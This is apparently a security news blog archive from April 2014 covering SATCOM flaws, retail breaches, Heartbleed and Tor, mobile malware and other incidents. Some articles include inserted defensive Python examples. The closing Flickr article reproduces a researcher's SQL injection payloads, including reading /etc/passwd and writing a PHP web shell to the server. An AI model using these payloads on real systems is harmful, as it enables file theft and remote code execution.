Apr 19 14

Satellite equipment affected by severe vulnerabilities

by paganinip

A study conducted by experts at IOActive uncovered a variety of severe vulnerabilities in Satellite equipment widely used in numerous industries.

Satellite communication devices are vulnerable to cyber attacks because of critical design flaws in the firmware of the principal satellite ground equipment. According to security experts at IOActive, satellite systems manufactured by some of the world’s biggest government contractors are affected by severe vulnerabilities. The researchers uncovered numerous vulnerabilities in software and ground-based satellite systems manufactured by the British suppliers Cobham and Inmarsat. Attackers can hijack and disrupt communication links used in various industries, including defense, aviation and communications, with serious consequences for the population.

“IOActive found that malicious actors could abuse all of the devices within the scope of this study. The vulnerabilities included what would appear to be backdoors, hardcoded credentials, undocumented and/or insecure protocols, and weak encryption algorithms. In addition to design flaws, IOActive also uncovered a number of features in the devices that clearly pose security risks,” states the report from IOActive.

Products sold by other manufacturers, including Iridium, Harris Corporation, Hughes, Thuraya and Japan Radio Company, are also flawed according to the study.

The vulnerable satellite equipment identified by the researchers at IOActive includes Harris’ RF-7800-VU024 and RF-7800-DU024 terminals for Broadband Global Area Network (BGAN) services; Hughes 9201/9202/9450/9502 for BGAN and BGAN M2M services; Thuraya IP for BGAN services; Cobham Explorer and SAILOR 900 VSAT for VSAT services; Cobham AVIATOR 700 (E/D) for SwiftBroadband Classic Aero services; Cobham SAILOR FB 150/250/500 for Inmarsat FB services; Cobham SAILOR 6000 Series for Inmarsat C services; JRC JUE-250/500 FB for Inmarsat FB services; and Iridium Pilot/OpenPort for Iridium services.

“You could attack one of these devices with SMS, and trigger features to install new firmware or to compromise it,” says Ruben Santamarta, principal security consultant for IOActive. “Attackers who compromise the database of an Inmarsat SIM/Terminals reseller can use this information to remotely compromise all those terminals.”

As Santamarta explains, a single SMS text message could become a weapon in the hands of cyber criminals. The researchers uncovered poor design habits in the device firmware: hardcoded credentials, insecure protocols, backdoors and weak password reset processes are some examples of the flawed mechanisms identified in the equipment.

In my opinion the most alarming fact is that, although the researcher reported the findings to the CERT Coordination Center, which promptly issued an alert to the vendors in January, the response to date has been faint. Among the many vendors, only Iridium has started working on patches.

“In most cases, attackers can completely compromise the system,” Santamarta says. “They could run their own code, install malicious firmware… and do anything they want with that device. They can spoof messages and trick the ship to follow a certain path, or to rescue another ship. They can disrupt communications… if a vessel can’t send a distress signal, that’s the worst scenario, if a ship can’t communicate.”

The same would be true for an airplane, he says. And an attacker would not even need physical access to the satellite equipment to pull off a link hijack or spoof; in many cases, hackers could execute their attacks remotely.

The researchers discovered the vulnerabilities simply by reverse engineering the firmware of the satellite appliances; once the flaws are known, the only remaining problem for an attacker is to reach the systems through the Internet or some other interface.

“I wasn’t looking for memory or buffer overflow or other typical vulnerabilities. But design flaws [found] like backdoors or [weak] protocols are in a way more dangerous because you can reach the device” by using them.

“But if you can reach the device, you can compromise it. You can access it through HTTP or some other kind of documented interfaces. In most cases, you can remotely exploit these flaws.”

The IOActive report also provides recommendations for users of this satellite equipment, inviting them to seriously consider the possibility that attackers exploit these vulnerabilities.

“Owners and providers should evaluate the network exposure of these devices, implement secure policies, enforce network segmentation, and apply restrictive traffic flow templates (TFT) when possible. Until patches are available, vendors should provide official workarounds in addition to recommended configurations in order to minimize the risk these vulnerabilities pose.”

The researchers at IOActive also recommend that SATCOM manufacturers and resellers immediately remove all publicly accessible copies of device firmware updates from their websites, to hinder reverse engineering.

“If one of these affected devices can be compromised, the entire SATCOM infrastructure could be at risk. Ships, aircraft, military personnel, emergency services, media services, and industrial facilities (oil rigs, gas pipelines, water treatment plants, wind turbines, substations, etc.) could all be impacted by these vulnerabilities. The results of IOActive’s research should be a wake-up call for both the vendors and users of the current generation of SATCOM technology,” is the statement that closes the report.

Pierluigi Paganini

(Security Affairs –  Satellite equipment, cyber security)

Apr 18 14

US retailer Michaels Stores confirms card data breach

by paganinip

After Target and Neiman Marcus, US retailer Michaels Stores also confirms a card data breach that occurred early this year, the second in the company’s history.

Early this year the news spread that Michaels Stores Inc., the biggest U.S. arts and crafts retailer, had been the victim of a severe data breach.

Michaels Stores Inc. was the latest victim in a series of massive data breaches, a few weeks after the hacks of US retailers Target and Neiman Marcus. Michaels Stores Inc. has more than 1,250 stores across the United States; in January fraud experts detected a pattern of illicit activity on a set of cards that had all recently been used at the company’s stores.

This week Michaels Stores Inc. confirmed that certain payment systems at its U.S. stores and at its Aaron Brothers unit had been compromised, as reported by the Reuters news agency.

According to the first revelations made by Michaels Stores representatives, the data breach occurred between May 8, 2013 and January 27, 2014. Its impact is considerable: data on an estimated 2.6 million cards was stolen, about 7 percent of the payment cards used by its customers at the US stores.

Michaels Stores Inc. also confirmed the potential exposure of data related to 400,000 cards at its Aaron Brothers unit in the period between June 26, 2013 and February 27, 2014.

“There was no evidence that data such as customers’ names or personal identification numbers were at risk,” Michaels Stores said in a statement.

The systems at Michaels Stores were infected with malware designed to steal payment information; with the support of a cyber security firm, the malicious code was identified and removed from the machines.

US retailers are planning to form an industry group to share information on incidents and to establish a surveillance center for fraud prevention. Cyber threats targeting retailers are becoming more complex and harder to identify; security firms suggest a layered approach to promptly identify the patterns of ongoing attacks.

Pierluigi Paganini

(Security Affairs –  Michaels Stores, data breach)

Apr 18 14

Ponemon study – SQL Injection attacks too dangerous for organizations

by paganinip

A new study conducted by the Ponemon Institute reveals the impact of successful SQL injection attacks on organizations during the last year.

The Ponemon Institute published a new study titled “The SQL Injection Threat Study” to understand how organizations respond to the SQL injection threat.

The study is sponsored by DB Networks, whose Chairman and CEO Brett Helm used the following words to describe the impact of SQL injection attacks:

“It’s well known that SQL injection attacks are rampant and have proven to be devastating to organization of all sizes. This study delves into both the scope and many of the root causes of SQL injection breaches,“

The analysis reveals that 65% of organizations suffered successful SQL injection attacks in the last twelve months, attacks that were able to evade the victims’ defenses.

“We believe this is the first study to survey the risks and remedies regarding SQL injection attacks, and the results are very revealing,” commented Dr. Larry Ponemon. “It is commonly accepted that organizations believe they struggle with SQL injection vulnerabilities, and almost half of the respondents said the SQL injection threat facing their organization is very significant, but this study examines much deeper issues.”

The worrying news is that, although about one third of respondents believe their organization has the necessary technology to detect and mitigate these threats, the success rate of SQL injection attacks remains too high.

According to the Ponemon SQL Injection Threat Study, 52% of respondents reported having adopted third-party software to detect the attack, but that they haven’t tested it.

49 percent of respondents said the SQL injection threat represents a serious problem for their company; SQL injection is considered one of the primary causes of data breaches.

Cybercriminals are adopting ever more sophisticated techniques, but too many organizations are not aware of the principal attack patterns, which leaves them more exposed to cyber attacks.

“Less than half of respondents (46 percent) are familiar with the term Web Application Firewalls (WAF) bypass. Only 39 percent of respondents are very familiar or familiar with the techniques cyber criminal use to get around WAF perimeter security devices.” states the report.

The impact of SQL injection attacks on organizations is very serious; the threat is insidious and hard to detect: breaches required an average of nearly 140 days to discover, with an additional 68 days on average needed to remediate.

Report highlights are:

  • 65% of respondents had experienced SQL injection attacks that successfully evaded their perimeter defenses in the past 12 months
  • SQL injection breaches required an average of nearly 140 days to discover with an additional 68 days on average needed to remediate
  • Nearly half of respondents (46%) were familiar with the term “WAF Bypass”
  • 88% of respondents had a favorable or very favorable opinion of the use of behavioral analysis technology for detecting SQL injection attacks
  • 44% utilize professional penetration testers to identify vulnerabilities in their IT systems; but only a third (35%) of those penetration tests were allowed to actually test for SQL injection vulnerabilities

Pierluigi Paganini

(Security Affairs –  Ponemon Institute, SQL injection)

Apr 18 14

The impact of the HeartBleed Bug on Tor Anonymity

by paganinip

The presence of nearly 380 servers in the Tor network, 12 percent of the exit capacity, running a vulnerable version of OpenSSL could have compromised users’ anonymity.

The Heartbleed bug is the flaw in the popular OpenSSL library that is scaring the security community; many experts hypothesized that intelligence agencies, including the NSA, have exploited the bug to spy on protected communications and to steal sensitive information from affected systems. No doubt the Heartbleed bug has a significant impact on server infrastructure and on the mobile industry, but what is its impact on the Tor network?
The Heartbleed bug also has a serious impact on the online anonymity of Tor users. To understand how, keep in mind that Tor makes a user’s online activity untraceable by distributing connections over unpredictable paths through a network of nodes.
When a user accesses any resource on the visible web through the Tor network, his IP address is masked: the connection appears to originate from a Tor exit relay.
A Tor relay receives traffic on the Tor network and passes it along; exit nodes are a particular kind of relay, the final relay that Tor traffic passes through before it reaches its destination.
Tor anonymity could be compromised if an attacker is able to grab encrypted information from the nodes, and that is possible if they run a version of the OpenSSL library affected by the Heartbleed bug.
To prevent exploitation of the Heartbleed bug on the affected nodes, and the consequent disclosure of sensitive information, Tor Project leader Roger Dingledine identified and rejected 380 vulnerable exit nodes, suggesting that exit nodes running vulnerable versions of OpenSSL be blacklisted from the network and readmitted only after they have been upgraded.
“If the other directory authority operators follow suit, we’ll lose about 12% of the exit capacity and 12% of the guard capacity,” he writes on the software’s mailing list.
The impact is critical: 380 nodes represent nearly 12 percent of the exit capacity, and the Heartbleed bug could be exploited to compromise a vulnerable exit node and capture traffic data related to users’ anonymous connections.
“I thought for a while about trying to keep my list of fingerprints up-to-date (i.e. removing the !reject line once they’ve upgraded their openssl), but on the other hand, if they were still vulnerable as of yesterday, I really don’t want this identity key on the Tor network even after they’ve upgraded their OpenSSL,” Dingledine wrote.
Anyone who had the ability to exploit the Heartbleed bug in the past months has probably already broken the cloak of anonymity that protects Tor users.
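The triage Dingledine describes is a version check per relay followed by a `!reject` line per vulnerable fingerprint and a tally of how much exit capacity those rejections cost. The following Python is an added example, not the Tor Project’s code: the relay list is constructed (the fingerprints are placeholders, and the `openssl` field is an assumption, since relays do not advertise their OpenSSL version in this form), and the `!reject <fingerprint>` line format is taken from the quote above.

```python
import re

# Constructed sample of relay records; fingerprints and OpenSSL versions are made up,
# not real Tor relays. The "openssl" field is an assumption for the purpose of the example.
SAMPLE_RELAYS = [
    {"fingerprint": "0000000000000000000000000000000000000001", "openssl": "1.0.1e",      "exit": True,  "bandwidth": 100},
    {"fingerprint": "0000000000000000000000000000000000000002", "openssl": "1.0.1g",      "exit": True,  "bandwidth": 300},
    {"fingerprint": "0000000000000000000000000000000000000003", "openssl": "1.0.0k",      "exit": False, "bandwidth": 200},
    {"fingerprint": "0000000000000000000000000000000000000004", "openssl": "1.0.1f-fips", "exit": True,  "bandwidth": 100},
    {"fingerprint": "0000000000000000000000000000000000000005", "openssl": "0.9.8y",      "exit": True,  "bandwidth": 500},
    {"fingerprint": "0000000000000000000000000000000000000006", "openssl": "1.0.2-beta1", "exit": False, "bandwidth": 50},
]

VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)([a-z]?)(.*)$")


def is_heartbleed_vulnerable(version: str) -> bool:
    """True for OpenSSL releases that shipped the Heartbleed bug: 1.0.1 through 1.0.1f,
    plus 1.0.2-beta1. 1.0.1g and the 1.0.0 and 0.9.8 branches are not affected."""
    m = VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unparseable OpenSSL version: {version!r}")
    major, minor, patch, letter, rest = int(m[1]), int(m[2]), int(m[3]), m[4], m[5]
    if (major, minor, patch) == (1, 0, 1):
        return letter == "" or letter <= "f"
    if (major, minor, patch) == (1, 0, 2):
        return "beta1" in rest
    return False


def plan_rejections(relays):
    """Return the '!reject <fingerprint>' lines for vulnerable relays and the percentage
    of exit bandwidth the network loses if all of them are rejected."""
    reject_lines = []
    exit_total = exit_lost = 0
    for relay in relays:
        vulnerable = is_heartbleed_vulnerable(relay["openssl"])
        if vulnerable:
            reject_lines.append(f"!reject {relay['fingerprint']}")
        if relay["exit"]:
            exit_total += relay["bandwidth"]
            if vulnerable:
                exit_lost += relay["bandwidth"]
    pct_exit_lost = 100.0 * exit_lost / exit_total if exit_total else 0.0
    return reject_lines, pct_exit_lost


if __name__ == "__main__":
    lines, pct = plan_rejections(SAMPLE_RELAYS)
    print("\n".join(lines))
    print(f"exit capacity lost: {pct:.1f}%")
```

The version check is deliberately strict about unparseable strings: a relay whose version cannot be read is an error to investigate, not a silent pass. Note that, as the quote explains, rejecting by identity key rather than by version means an upgraded relay is still not readmitted automatically, because the key itself may have been exposed while the node was vulnerable.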

Pierluigi Paganini

(Security Affairs –  Tor, HeartBleed Bug)

Apr 17 14

Cyber warriors fought between the government and the security industry

by paganinip

The demand for cyber security experts continues to rise; the US Government has announced further investment to recruit new cyber talent, but with many difficulties.

Cyber security is officially one of the top priorities of every government; many countries have announced huge investments to improve their cyber capabilities, a great effort that is having a significant impact on budgets and politics.

The military cyber spending reserved by the Pentagon for cyber operations next year is $5 billion, part of the comprehensive $496 billion fiscal 2015 budget; U.S. Secretary of Defense Chuck Hagel recently announced that the US Army plans to triple its cybersecurity staff by 2016.

“A fund spending within the $5.1 billion Military Cyber Spending will be reserved for cyber operations to go toward the continued development of 133 special cyber mission teams. A critical goal, of course, is the improvement on defense for critical infrastructure against internet-based attacks. The Pentagon has estimated that the number of cyber mission team staffers in place by 2016 will reach 6,000 units, including 13 national mission teams with eight national support teams,” I wrote in a previous article.

Information warfare is not the only goal; one of the primary aims is the fight against cybercrime. FBI Supervisory Special Agent Charles Gilgen announced that his agency’s cyber division plans to hire 1,000 agents and 1,000 analysts in the coming twelve months.

The overall number of cyber experts to be recruited in the next two years is 6,000 people, and to mitigate the shortage of experts the government is also trying to sustain training programs starting from the universities. A government program started in 2000, codenamed CyberCorps, promotes a series of activities to develop cyber security capabilities within the schools.

Participants must be US citizens and can receive a cash stipend of up to $30,000 a year, “depending on whether the student is pursuing a bachelor’s, a master’s, or a doctorate”; once they complete their studies, the students serve in government for the same length of time as they received funding.

Despite all these initiatives, the US Government has to face another serious problem: the migration of the highest cyber skills from government agencies to private industry, where talent is of course attracted by higher earnings.

“If you couldn’t break $100,000 as a starting salary, I think you’d have trouble attracting those guys,” said Golden Richard, a professor with the University of New Orleans Information Assurance Program.

The young cyber experts trained thanks to government programs are immediately recruited by private industry, which is willing to pay much more enticing figures for specific knowledge in cyber security.

The cyber shortage is also responsible for the massive recruitment of contractors in the cyber security and intelligence sectors, but the downside is the increased risk of disclosure of sensitive or classified material. Snowden’s case shocked the world and seriously injured the U.S. intelligence structure; its impact has led and will lead to a revolution in US intelligence.

Snowden’s revelations are the cause of a dangerous disaffection within the machine responsible for homeland security; many students have walked away from their training programs citing the case of the popular whistleblower.

Get ready: the cyber security landscape is probably set to change profoundly in the next two years, with opportunities for all the professionals like me who “live for security”.

Pierluigi Paganini

(Security Affairs –  Security,  Intelligence)

Apr 17 14

New iBanking mobile Trojan exploits Facebook platform

by paganinip

Security experts at ESET detected a new variant of the iBanking Trojan, offered in the underground, that uses the Facebook platform as an infection vector.

iBanking is a mobile banking Trojan app distributed through HTML injection attacks on banking sites. iBanking deceives victims by posing as a ‘Security App’ for Android; we wrote about it in early 2014, when the source code of the mobile malware was leaked online through an underground forum.

The iBanking mobile banking Trojan is available for sale in the underground for $5,000 according to RSA’s FraudAction Group; the malware is used to bypass the security mechanisms implemented by banking websites, including two-factor authentication.

iBanking can be commanded via SMS or over HTTP, beaconing to the C&C server at a pre-defined interval and then pulling and executing any command awaiting it. The bot implements the following features:

  • Capture all incoming/outgoing SMS messages
  • Redirect all incoming voice calls to a different pre-defined number
  • In/out/missed call-list capturing
  • Audio capturing via device’s microphone
  • Phone book capturing
  • URL status: the mobile device will visit a provided URL, returning its status (possibly for click-fraud schemes.)
Experts at the security firm ESET discovered a new variant of the iBanking trojan which uses Facebook as an infection vector.
According to a report issued by ESET security researchers, the new version of iBanking, aka Android/Spy.Agent.AF, targets Facebook users by tricking them into downloading a malicious application.
The new iBanking variant implements a webinject that was totally new to security experts: it uses JavaScript to inject content into Facebook web pages, in particular to create a fake Facebook verification page for Facebook users. Once the victim logs into his Facebook account, iBanking tries to inject the following content into the webpage:
[Image: the fake Facebook verification page injected by iBanking]

The verification page above was designed to ask victims for their mobile number in order to “verify” the authenticity of the Facebook account. If the SMS fails to reach the user’s mobile, one of the subsequent pages asks the victim to download an Android app from a displayed URL or by scanning a QR code shown on the screen.

Once iBanking is downloaded, the bot starts its activities and connects to the C&C server to receive commands.
iBanking, or any similar malware, is a privileged choice for cyber criminals because of its ability to bypass two-factor authentication, and the criminal underground is increasing its offer of mobile-oriented solutions. iBanking is considered a sophisticated solution by the experts at ESET, who compared it to other banking trojans like Perkele.
“iBanking, detected by ESET as Android/Spy.Agent.AF, is an application that showcases complex features when compared with other earlier mobile banking malware, such as Perkele. It can be used in conjunction with any malware able to inject code into a webpage and is generally used to redirect incoming SMS messages to bypass two-factor authentication,” reported ESET.
Another alarming hypothesis is that this Facebook iBanking app might be distributed by other banking malware in the coming months; cybercriminals could start adopting mobile components to attack other popular web services that enforce strong authentication.
The “commoditization” of malicious code and the source code leaks will sustain an offer that will keep increasing in complexity and efficiency.
Stay sharp!

Pierluigi Paganini

(Security Affairs –  iBanking, malware)

Apr 16 14

Intelligence could exploit Whatsapp bug to track users location

by paganinip

A group of researchers discovered a vulnerability in the WhatsApp “Location Share” feature which exposes users’ location to attackers.

Security issues in the WhatsApp application are not a novelty; such popular applications are continuously targeted by hackers and security experts searching for vulnerabilities to exploit. In early 2014 experts at Praetorian conducted Project Neptune to assess the security of the design and maintenance of mobile apps, including WhatsApp.

The researchers discovered several security issues in the way WhatsApp implements SSL, the principal one being the lack of certificate pinning, which exposed users to the risk of man-in-the-middle attacks; after several alerts the company fixed the flaws.

The latest bug discovered in the WhatsApp app exposes users’ location to attackers; under analysis in particular is the WhatsApp “Location Share” feature.

According to researchers at the UNH Cyber Forensics Research & Education Group, the location sharing feature implemented by WhatsApp could expose users’ location to attackers and intelligence agencies.

As illustrated by our colleagues at The Hacker News, in order to share their location on WhatsApp, users first need to locate themselves on Google Maps within the app window.

Once the user has selected the position, WhatsApp fetches it and retrieves an image from the Google Maps service; the thumbnail is then shared as the message icon. In this phase the user’s location is exposed, because WhatsApp downloads the image through an unencrypted channel from Google, allowing an attacker to capture it with a man-in-the-middle attack.

Below the video Proof of Concept:

“We were not able to intercept the image until the message was sent from the phone, indicating that the download of the image did not occur until the message was actually sent,” the researchers said.

To perform the MITM attack the bad actor must be on the same network, which means the attacker must be near the victim and probably already knows his location; but if an attacker is able to conduct MITM attacks on a large scale, the scenario changes.

“Such short-range dependency makes this vulnerability of very low severity level for normal attackers, but spy agencies like NSA or GCHQ, those are capable to perform large scale MITM attacks, could exploit this flaw to trace users’ location nation-wide,” Mohit Kumar explained in a comment.

The researchers promptly reported the vulnerability to WhatsApp, which fixed it in the latest beta version available on the company’s official website; the fix will soon be deployed in the official release as well.

While waiting for the fix, it is advisable to avoid sharing location via WhatsApp when connected to an untrusted network.
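The exposure described above is visible to anyone who can read the traffic: a plain-HTTP request whose query string carries the coordinates. The following Python audit is an added example, not code from the researchers or from WhatsApp. It runs over constructed proxy log lines and flags cleartext requests that carry a coordinate pair, which is the check an app or network team would run on their own logs to find applications that leak location in the clear. The URL shape is an assumption modelled on Google’s Static Maps API; the page does not say which exact request WhatsApp issued.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed proxy log excerpt, one "<epoch> <client-ip> <method> <url>" per line. Not real
# traffic. The second line shows what a TLS-terminating proxy would log for an HTTPS fetch;
# a plain proxy would only see a CONNECT to the host, which is exactly the point.
SAMPLE_PROXY_LOG = """\
1397600001.123 10.0.0.5 GET http://maps.googleapis.com/maps/api/staticmap?center=40.7410,-73.9897&zoom=15&size=200x200
1397600002.456 10.0.0.5 GET https://maps.googleapis.com/maps/api/staticmap?center=48.8584,2.2945&zoom=15
1397600003.789 10.0.0.7 GET http://example.org/tiles/3/4/5.png
1397600004.000 10.0.0.9 GET http://tiles.example.net/?ll=51.5007,-0.1246&z=12
1397600005.000 10.0.0.9 GET http://example.org/search?center=downtown
"""

# "lat,lon" with optional sign and decimals; range-checked below.
COORD_RE = re.compile(r"^\s*(-?\d{1,2}(?:\.\d+)?)\s*,\s*(-?\d{1,3}(?:\.\d+)?)\s*$")
# Query keys commonly used by map services to carry a position (assumption, extend as needed).
LOCATION_KEYS = ("center", "ll", "latlng", "q")


def extract_coordinates(url):
    """Return (lat, lon) if the URL's query string carries a coordinate pair, else None."""
    query = parse_qs(urlsplit(url).query)
    for key in LOCATION_KEYS:
        for value in query.get(key, []):
            m = COORD_RE.match(value)
            if not m:
                continue
            lat, lon = float(m[1]), float(m[2])
            if -90 <= lat <= 90 and -180 <= lon <= 180:
                return lat, lon
    return None


def find_cleartext_location_leaks(log_text):
    """Flag plain-HTTP requests whose URL exposes a coordinate pair to anyone on the path.
    HTTPS requests are skipped: their path and query travel inside TLS, only the host leaks."""
    leaks = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        client, url = fields[1], fields[3]
        parts = urlsplit(url)
        if parts.scheme != "http":
            continue
        coords = extract_coordinates(url)
        if coords is None:
            continue
        leaks.append({"client": client, "host": parts.hostname, "lat": coords[0], "lon": coords[1]})
    return leaks


if __name__ == "__main__":
    for leak in find_cleartext_location_leaks(SAMPLE_PROXY_LOG):
        print(f"{leak['client']} leaked {leak['lat']},{leak['lon']} in the clear to {leak['host']}")
```

The fix on the application side is the one the page implies: fetch the thumbnail over HTTPS, so the coordinates sit inside the TLS session and an on-path observer sees only the map host. The audit above then reports nothing for that app, which is the expected result after the patch.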

Pierluigi Paganini

(Security Affairs –  WhatsApp, mobile)

Apr 16 14

Samsung Galaxy S5 fingerprint sensor hacked

by paganinip

SRLabs researchers have published a video POC on YouTube to demonstrate how easy it is to bypass the fingerprint sensor on the Samsung Galaxy S5.

SRLabs researchers have published a video proof of concept on YouTube to demonstrate that they were able to bypass the fingerprint authentication mechanism implemented by the Samsung Galaxy S5. The researchers gained unauthorized access just by using a lifted fingerprint and a wood-glue based dummy finger. Remind you of anything?

The principal mobile manufacturers have tried to improve user security by adding biometric authentication systems based, for example, on fingerprints. Months ago Apple proposed its Touch ID system, which was easily hacked, and today security experts have found a way to bypass the Samsung Galaxy S5 fingerprint feature as well. The feature implemented in the Samsung Galaxy S5 is also used to facilitate payments through PayPal, theoretically making them more secure.

The Samsung Galaxy S5 also implements a feature that lets users easily transfer money via PayPal just by swiping a finger on the fingerprint sensor, but the attack presented by the SRLabs team could allow bad actors to access the victim’s PayPal account without providing any password. A few days after the official commercial launch of the Samsung Galaxy S5, security experts successfully hacked its fingerprint sensor with a method quite similar to the one used to deceive Apple’s Touch ID sensor.

SRLabs researchers exploited the poor security implementation of the handset’s fingerprint scanner: the Samsung Galaxy S5 scanner allows multiple incorrect attempts without requiring a password, which means a bad actor could make an unlimited number of tries until a match succeeds.

Another concerning issue related to the hack presented by the researchers is that after a restart the Samsung Galaxy S5 doesn’t require the user to enter a passcode before the fingerprint can be used to unlock the smartphone, meaning that in case of theft attackers could have complete access to the device. Although attackers need physical access to the Samsung Galaxy S5 to exploit the vulnerability, it is clear that the fingerprint feature implemented by the giant lacks a proper security design. I’m sure Samsung will promptly fix it.
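The two weaknesses described above, unlimited fingerprint attempts without a passcode fallback and fingerprint unlock straight after a reboot, are lock-screen policy decisions. The following Python model is an added example, not Samsung’s code: a hypothetical lock-screen state machine with two knobs, configured once as the weak policy the article describes and once as a hardened policy, so the difference in how many guesses a dummy finger gets can be measured directly.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class UnlockPolicy:
    """Hypothetical lock-screen state machine mixing fingerprint and passcode unlock.
    The two knobs model the two weaknesses discussed above; this is not Samsung's design."""
    max_biometric_failures: Optional[int] = 5   # None = unlimited sensor attempts
    passcode_required_after_boot: bool = True   # False = fingerprint usable right after reboot
    failures: int = 0
    passcode_seen_since_boot: bool = False

    def biometric_allowed(self) -> bool:
        """May the sensor even be consulted in the current state?"""
        if self.passcode_required_after_boot and not self.passcode_seen_since_boot:
            return False
        if self.max_biometric_failures is not None and self.failures >= self.max_biometric_failures:
            return False
        return True

    def try_biometric(self, sensor_matched: bool) -> str:
        """One fingerprint attempt. sensor_matched is the sensor's verdict; a dummy finger
        that fools the sensor simply yields True, so the policy is the only remaining guard."""
        if not self.biometric_allowed():
            return "passcode_required"
        if sensor_matched:
            self.failures = 0
            return "unlocked"
        self.failures += 1
        return "retry" if self.biometric_allowed() else "passcode_required"

    def try_passcode(self, correct: bool) -> str:
        """A correct passcode resets the failure counter and satisfies the post-boot requirement."""
        if correct:
            self.failures = 0
            self.passcode_seen_since_boot = True
            return "unlocked"
        return "denied"


def weak_policy() -> UnlockPolicy:
    """Behaviour as described for the Galaxy S5: unlimited tries, no passcode after boot."""
    return UnlockPolicy(max_biometric_failures=None, passcode_required_after_boot=False)


def hardened_policy() -> UnlockPolicy:
    """Bounded sensor attempts and a mandatory passcode on first unlock after boot."""
    return UnlockPolicy()


def count_sensor_evaluations(policy: UnlockPolicy, budget: int) -> int:
    """Simulate `budget` failed fingerprint attempts and return how many of them the policy
    actually let reach the sensor, i.e. how many guesses a dummy finger gets."""
    evaluated = 0
    for _ in range(budget):
        if policy.biometric_allowed():
            evaluated += 1
        policy.try_biometric(False)
    return evaluated


if __name__ == "__main__":
    print("weak policy, 100 bad fingers evaluated:", count_sensor_evaluations(weak_policy(), 100))
    h = hardened_policy()
    print("hardened, fingerprint right after boot:", h.try_biometric(True))
    h.try_passcode(True)
    print("hardened, 100 bad fingers evaluated:", count_sensor_evaluations(h, 100))
```

With the hardened policy a stolen, rebooted phone never consults the sensor until the passcode has been entered, and after five bad attempts it falls back to the passcode; with the weak policy every attempt is evaluated, which is what makes the dummy-finger approach practical.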

Pierluigi Paganini

(Security Affairs –  Samsung Galaxy S5, mobile)

Apr 16 14

German Aerospace Center hit by serious malware-based attack

by paganinip

The German Aerospace Center was the victim of a cyber espionage attack; many computers were infected by sophisticated Trojans and other spyware.

Cyber espionage is considered today one of the most alarming cyber threats for governments and private industry; a growing number of attacks have the primary purpose of stealing sensitive information such as secret documents and intellectual property.

Recently the US Government has raised the alert level of the cyber threat in consideration of the numerous attacks observed during the last twelve months.

The news of the day is related to a new significant malware-based attack against the German Aerospace Centre (DLR – Deutsches Zentrum für Luft- und Raumfahrt e. V.).

The disturbing news was reported by Der Spiegel during the weekend: the German Aerospace Centre was hit by an attack conducted by foreign state-sponsored hackers.

The German Aerospace Centre is located in Cologne, and in its buildings research is conducted on technologies for defense, communications, air safety and the environment.

The outlet reported the cyber attack as a “coordinated and systematic” offensive, probably conducted by a foreign intelligence agency.

Several computers within the German Aerospace Centre were infected by Trojans and other spyware used to gather sensitive information.

“As is now known, the DLR has been fighting for months against the alleged assault of a foreign intelligence service: according to research by SPIEGEL, DLR turned to the National Cyber Defence Centre in Bonn after several computers of researchers and system administrators had been infiltrated with espionage programs,” reported Der Spiegel.

The operation appears to be a long-term cyber espionage program, and as usually happens in these cases the first suspect is China, the most persistent collector of information. The first results of the investigation refer to Chinese characters present in the source code of the malware used.

“IT forensic experts of the Federal Office for Security in Information Technology (BSI) discovered in the code of some Trojans Chinese characters and recurring typos that suggest attackers from the Far East.”

“But it could also be a simple camouflage,” says an insider; an attack from the West, such as by the U.S. secret service NSA, cannot be completely ruled out. “The federal government classifies the case as extremely serious because it aims, among other things, at armor and missile technology,” reports the newspaper.

The attack on the German Aerospace Center (DLR) appears very sophisticated: the forensic investigators who analyzed the infected systems were not able to recover the malware used in the attacks, because the Trojans that compromised the targets were designed to self-destruct as soon as they were discovered. The report states that the malicious agents were able to remain hidden for a long time, infecting all the operating systems used at the German Aerospace Center.

The investigation is still ongoing; the German authorities consider the cyber attack an alarming event and a demonstration that foreign intelligence agencies are very interested in gathering sensitive information and secret projects based on advanced research.

Pierluigi Paganini

(Security Affairs –  German Aerospace Center, cyber espionage)

Apr 15 14

Flickr affected by critical SQL Injection and Remote Code Execution bugs

by paganinip

The security expert Ibrahim Raafat discovered critical SQL injection vulnerabilities in Flickr Photo Books which allow attackers to gain complete control of the server and its database.

The online photo management and sharing giant Flickr, a Yahoo-owned company, was affected by critical vulnerabilities that allow attackers to gain access to the web server and the website database.

The alarming discovery was announced by the Egyptian security expert Ibrahim Raafat, who found a critical SQL injection vulnerability in Flickr Photo Books, the feature implemented by Flickr for printing custom photo books through the image hosting website.

Flickr Photo Books was launched recently, nearly 5 months ago. Raafat discovered that by manipulating some parameters he was able to conduct SQL injection on the website. Acting on the two parameters:

  • page_id
  • items

Raafat was able to conduct a blind SQL injection, while by modifying the parameter order_id he was able to conduct a direct SQL injection that gave the researcher full access to the Flickr database.

Raafat started analyzing the HTTP headers of all the requests sent to the platform and checking every single parameter, and found a direct SQL injection in the order_id parameter of this POST request:

order_id=116564954&first_name=aaaa&last_name=sssss&street1=ddddddddddd&street2=ddddddd&city=fffffff&state=ff&postal_code=12547&country_code=US&phone=45454545457&method=flickr.products.orders.setShippingAddress&csrf=1365645560%3Acmj2m0s5jvyrpb9%kld65d65d54d54d55d45dsq&api_key=3c7ab2846f4183ecg56s96d5d5w4e644268&format=json&hermes=1&hermesClient=1&reqId=q3oovqa&nojsoncallback=1
Once inside the DB, the hacker has several options, such as dumping the DB and stealing the MySQL administrator password.

But as the researcher remarked, the SQL injection vulnerability could also be exploited by attackers for remote code execution on the Flickr server: he managed to read some server files (such as /etc/passwd and some log files) by using the LOAD_FILE function:

order_id=-116564954 union
select load_file(“/etc/passwd“),2,3,4,5,6,7,8,9,10,11,12,13,14,15– -

To complete his hack, Raafat also wrote new files on the server file system; combined with the use of load_file, this allowed him to write and execute any kind of script directly on the server, letting an attacker upload a code execution shell.

order_id=-116564954 union select “@RaafatSEC“,2,3,4,5,6,7,8,9,10,11,12,13,14,15 INTO OUTFILE “/tmp/raafat“– -
I tested reading it via load_file, it worked, Check the video
Changing the text and file path to my code
order_id=-116564954 union select “<?php $cmd = $_GET['raafat']; echo sy stem ($cmd); ?>“,2,3,4,5,6,7,8,9,10,11,12,13,14,15 INTO OUTFILE “/home/$path/rce.php“– -
/rce.php?raafat=ls -la

Following, the video POC published by the security expert:

Yahoo immediately patched the flaws after the researcher reported them.
